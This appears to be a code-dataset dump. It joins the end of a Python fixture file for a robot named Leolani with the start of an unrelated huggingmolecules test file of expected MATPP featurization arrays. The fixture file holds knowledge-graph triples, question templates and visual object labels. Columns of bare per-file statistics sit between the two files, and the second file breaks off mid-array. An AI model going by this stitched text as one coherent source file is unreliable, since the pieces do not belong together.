"chat": 1,
"turn": 6,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # bram likes The Big Lebowski
"subject": {
"label": "bram",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "the_big_lebowski",
"type": "movie"
},
"author": "selene",
"chat": 1,
"turn": 7,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # bram likes baseball
"subject": {
"label": "bram",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "baseball",
"type": "sport"
},
"author": "selene",
"chat": 1,
"turn": 8,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # bram likes romantic movies
"subject": {
"label": "bram",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "romantic_movies",
"type": "film_genre"
},
"author": "selene",
"chat": 1,
"turn": 9,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # lenka likes ice cream
"subject": {
"label": "lenka",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "ice_cream",
"type": "dish"
},
"author": "selene",
"chat": 1,
"turn": 10,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # lenka likes Harry Potter
"subject": {
"label": "lenka",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "harry_potter",
"type": "movie"
},
"author": "selene",
"chat": 1,
"turn": 11,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # lenka likes acrobatics
"subject": {
"label": "lenka",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "acrobatics",
"type": "sport"
},
"author": "selene",
"chat": 1,
"turn": 12,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # lenka likes action movies
"subject": {
"label": "lenka",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "action_movies",
"type": "film_genre"
},
"author": "selene",
"chat": 1,
"turn": 13,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # piek likes balkenbrij
"subject": {
"label": "piek",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "balkenbrij",
"type": "dish"
},
"author": "selene",
"chat": 1,
"turn": 14,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # piek likes 2001 A Space Odyssey
"subject": {
"label": "piek",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "2001_a_space_odyssey",
"type": "movie"
},
"author": "selene",
"chat": 1,
"turn": 15,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # piek likes soccer
"subject": {
"label": "piek",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "soccer",
"type": "sport"
},
"author": "selene",
"chat": 1,
"turn": 16,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # piek likes horror movies
"subject": {
"label": "piek",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "horror_movies",
"type": "film_genre"
},
"author": "selene",
"chat": 1,
"turn": 17,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # selene likes tacos
"subject": {
"label": "selene",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "tacos",
"type": "dish"
},
"author": "selene",
"chat": 1,
"turn": 18,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # selene likes Coco
"subject": {
"label": "selene",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "coco",
"type": "movie"
},
"author": "selene",
"chat": 1,
"turn": 19,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # selene likes soccer
"subject": {
"label": "selene",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "soccer",
"type": "sport"
},
"author": "selene",
"chat": 1,
"turn": 20,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # selene likes animated movies
"subject": {
"label": "selene",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "animated_movies",
"type": "film_genre"
},
"author": "selene",
"chat": 1,
"turn": 21,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # bram knows lenka
"subject": {
"label": "bram",
"type": "person"
},
"predicate": {
"type": "knows"
},
"object": {
"label": "lenka",
"type": "person"
},
"author": "selene",
"chat": 1,
"turn": 22,
"position": "0-16",
"date": date(2018, 3, 19)
},
{ # Leolani is from France
"subject": {
"label": "leolani",
"type": "robot"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "france",
"type": "location"
},
"author": "selene",
"chat": 1,
"turn": 23,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # Leolani is from Japan
"subject": {
"label": "leolani",
"type": "robot"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "japan",
"type": "location"
},
"author": "selene",
"chat": 1,
"turn": 24,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # lenka mother is ljubica (lenka)
u'predicate': {u'type': u'mother_is'},
u'chat': u'',
u'author': u'lenka',
u'object': {u'type': u'', u'id': u'', u'label': u'ljubica'},
u'turn': u'',
u'utterance_type': u'statement',
u'date': date(2018, 3, 19),
u'position': u'0-25',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'lenka'}
},
{ # bram likes action movies (bram)
u'predicate': {u'type': u'likes'},
u'chat': u'',
u'author': u'bram',
u'object': {u'type': u'', u'id': u'', u'label': u'action_movies'},
u'turn': u'',
u'utterance_type': u'statement',
u'date': date(2018, 3, 19),
u'position': u'0-25',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'bram'}
},
{ # bram likes romantic movies (selene)
u'predicate': {u'type': u'likes'},
u'chat': u'',
u'author': u'selene',
u'object': {u'type': u'', u'id': u'', u'label': u'romantic_movies'},
u'turn': u'',
u'utterance_type': u'statement',
u'date': date(2018, 3, 19),
u'position': u'0-25',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'bram'}
},
{ # bram is_from Italy (selene)
u'predicate': {u'type': u'is_from'},
u'chat': u'',
u'author': u'selene',
u'object': {u'type': u'location', u'id': u'', u'label': u'italy'},
u'turn': u'',
u'utterance_type': u'statement',
u'date': date(2018, 3, 19),
u'position': u'0-25',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'bram'}
},
{ # lenka favorite food-is cake (lenka)
u'predicate': {u'type': u'favorite'},
u'chat': u'',
u'author': u'lenka',
u'object': {u'type': u'', u'id': u'', u'label': u'cake'},
u'turn': u'',
u'utterance_type': u'statement',
u'date': date(2018, 3, 19),
u'position': u'0-25',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'lenka'}
}
]
questions = [
{
u'predicate': {u'type': 'is_from'},
u'chat': 0,
u'author': u'jo',
u'object': {u'type': u'', u'id': u'', u'label': ''},
u'turn': 7, u'utterance_type': 'question',
u'date': '',
u'position': u'',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'bram'}},
{ # Who is from Serbia? -> lenka, selene
"subject": {
"label": "",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "serbia",
"type": "location"
}
},
{ # Where is lenka from? -> Serbia, selene
"subject": {
"label": "lenka",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "",
"type": "location"
}
},
{ # Does selene know piek? -> (yes) selene
"subject": {
"label": "selene",
"type": "person"
},
"predicate": {
"type": "knows"
},
"object": {
"label": "piek",
"type": "person"
}
},
{ # Is bram from the netherlands? -> (idk) empty
"subject": {
"label": "bram",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "netherlands",
"type": "location"
}
},
{ # bram knows Beyonce
u'predicate':
{u'type': u'knows'},
u'chat': u'',
u'author': u'person',
u'object':
{u'type': u'', u'id': u'', u'label': u'beyonce'},
u'turn': u'',
u'utterance_type': u'question',
u'date': date(2018, 3, 19),
u'position': u'',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'bram'}
},
{ # Leolani knows bram
u'predicate': {u'type': u'knows'}, u'chat': u'', u'author': u'bram',
u'object': {u'type': u'person', u'id': u'', u'label': u'bram'}, u'turn': u'',
u'utterance_type': u'question',
u'date': date(2018, 3, 19), u'position': u'', u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'leolani'}
},
{ # selene knows piek
u'predicate': {u'type': u'knows'}, u'chat': u'', u'author': u'person',
u'object': {u'type': u'person', u'id': u'', u'label': u'piek'}, u'turn': u'',
u'utterance_type': u'question',
u'date': date(2018, 3, 19), u'position': u'', u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'selene'}
},
{ # Where is Leolani from?
u'predicate': {u'type': u'is_from'}, u'chat': u'', u'author': u'person',
u'object': {u'type': u'', u'id': u'', u'label': u''}, u'turn': u'', u'utterance_type': u'question',
u'date': date(2018, 3, 19), u'position': u'', u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'leolani'}
},
{ # Who is from italy
u'predicate': {u'type': u'is_from'}, u'chat': u'', u'author': u'jill',
u'object': {u'type': u'', u'id': u'', u'label': u'italy'}, u'turn': u'', u'utterance_type': u'question',
u'date': date(2018, 3, 19), u'position': u'', u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u''}
},
{ # what does piek like (jo)
u'predicate': {u'type': u'likes'},
u'chat': u'',
u'author': u'jo',
u'object': {u'type': u'', u'id': u'', u'label': u''},
u'turn': u'',
u'utterance_type': u'question',
u'date': date(2018, 3, 19),
u'position': u'',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'piek'}
}
]
experiences = [
{ # Leolani saw an apple
"subject": {
"label": "",
"type": ""
},
"predicate": {
"type": ""
},
"object": {
"label": "apple",
"type": "fruit"
},
"author": "front_camera",
"chat": None,
"turn": None,
"position": "0-15-0-15",
"date": date(2018, 3, 19)
}
]
visuals = [
['tv', "carpenter's kit", 'tool kit'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['laptop', 'laptop', 'laptop computer'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'laptop', 'laptop computer'],
['laptop', 'laptop', 'laptop computer'],
['laptop', 'laptop', 'laptop computer'],
['laptop', 'laptop', 'laptop computer'],
['laptop', 'laptop', 'laptop computer'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'notebook', 'notebook computer'],
['chair', 'desk'],
['laptop', 'notebook', 'notebook computer'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'notebook', 'notebook computer'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'printer'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'notebook', 'notebook computer'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'notebook', 'notebook computer'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'notebook', 'notebook computer'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'notebook', 'notebook computer'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['tv', 'espresso maker'],
['tv', 'espresso maker'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['tv', 'espresso maker'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['chair', 'desk'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', "potter's wheel"],
['potted plant', 'pot', 'flowerpot'],
['potted plant', "potter's wheel"],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', "potter's wheel"],
['potted plant', 'pot', 'flowerpot'],
['tv', 'pay-phone', 'pay-station'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['tv', "carpenter's kit", 'tool kit'],
['tv', "carpenter's kit", 'tool kit'],
['tv', "carpenter's kit", 'tool kit'],
['tv', 'espresso maker'],
['tv', 'pay-phone', 'pay-station'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', "potter's wheel"],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', "potter's wheel"],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['tv', "carpenter's kit", 'tool kit'],
['tv', "carpenter's kit", 'tool kit'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['laptop', 'notebook', 'notebook computer'],
['chair', 'desk']
]
sample_coco = ['Bag', 'backpack', 'handbag', 'suitcase', 'umbrella', 'tie', 'Animal', 'bird', 'cat', 'dog', 'horse',
'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe', 'Food', 'banana', 'apple', 'orange', 'carrot',
'broccoli', 'cake', 'pizza', 'hot dog', 'donut', 'sandwich', 'Sports', 'tennis racket',
'badminton racket', 'baseball bat', 'kite', 'snowboard', 'ball', 'basketball', 'Furniture', 'chair',
'sofa', 'bed', 'toilet', 'couch', 'fridge', 'Office', 'keyboard', 'mouse', 'cellphone', 'tv', 'laptop',
'Miscellaneous', 'Book', 'clock']
| 28.565457
| 118
| 0.450936
| 2,670
| 25,966
| 4.367416
| 0.071536
| 0.126404
| 0.154875
| 0.254438
| 0.88037
| 0.877283
| 0.862447
| 0.813224
| 0.804048
| 0.773347
| 0
| 0.023176
| 0.305399
| 25,966
| 908
| 119
| 28.596916
| 0.623364
| 0.040014
| 0
| 0.705426
| 0
| 0
| 0.410552
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001107
| 0
| 0.001107
| 0.001107
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5016d1df201c0d351f9a0f4f658ee86148e5e6de
| 19,469
|
py
|
Python
|
src/tests/featurization/expected/featurization_expected_matpp.py
|
panpiort8/huggingmolecules-1
|
7caf9bb355db86a0d0e8423088c4328770b4db0d
|
[
"Apache-2.0"
] | 1
|
2021-11-04T03:06:08.000Z
|
2021-11-04T03:06:08.000Z
|
src/tests/featurization/expected/featurization_expected_matpp.py
|
gabegomes/huggingmolecules
|
adc581c97fbc21d9967dd9334afa94b22fb77651
|
[
"Apache-2.0"
] | null | null | null |
src/tests/featurization/expected/featurization_expected_matpp.py
|
gabegomes/huggingmolecules
|
adc581c97fbc21d9967dd9334afa94b22fb77651
|
[
"Apache-2.0"
] | null | null | null |
from huggingmolecules.featurization.featurization_matpp import MatppBatchEncoding, MatppMoleculeEncoding
from numpy.ma import array
from torch import FloatTensor
expected_encoded_smiles = [
MatppMoleculeEncoding(
node_features=array([[0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.,
1., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.,
1., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.]]),
bond_features=array([[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 0., 0., 1.],
[0., 0., 0., 1., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]]]),
distance_matrix=array([[1.00000000e+06, 1.00000000e+06, 1.00000000e+06, 1.00000000e+06, 1.00000000e+06],
[1.00000000e+06, 0.00000000e+00, 1.49726307e+00, 2.46955644e+00, 3.85851083e+00],
[1.00000000e+06, 1.49726307e+00, 0.00000000e+00, 1.33899508e+00, 2.46955692e+00],
[1.00000000e+06, 2.46955644e+00, 1.33899508e+00, 0.00000000e+00, 1.49726303e+00],
[1.00000000e+06, 3.85851083e+00, 2.46955692e+00, 1.49726303e+00, 0.00000000e+00]]),
relative_matrix=array([[[1., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.]],
[[0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0.],
[0., 1., 0., 1., 0.],
[0., 0., 1., 0., 1.],
[0., 0., 0., 1., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0.],
[0., 0., 0., 0., 1.],
[0., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 1., 0., 0., 0.]],
[[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]],
[[0., 1., 1., 1., 1.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.]]]),
y=None),
MatppMoleculeEncoding(
node_features=array([[0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.]]),
bond_features=array([[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 1.],
[0., 1., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]]]),
distance_matrix=array([[1.00000000e+06, 1.00000000e+06, 1.00000000e+06],
[1.00000000e+06, 0.00000000e+00, 1.21945472e+00],
[1.00000000e+06, 1.21945472e+00, 0.00000000e+00]]),
relative_matrix=array([[[1., 0., 0.],
[0., 1., 0.],
[0., 0., 1.]],
[[0., 0., 0.],
[0., 0., 1.],
[0., 1., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 0., 0.],
[0., 0., 0.],
[0., 0., 0.]],
[[0., 1., 1.],
[1., 0., 0.],
[1., 0., 0.]]]), y=None)]
expected_batch = MatppBatchEncoding(
node_features=FloatTensor([[[0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.,
1., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.,
1., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.]],
[[0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 1., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
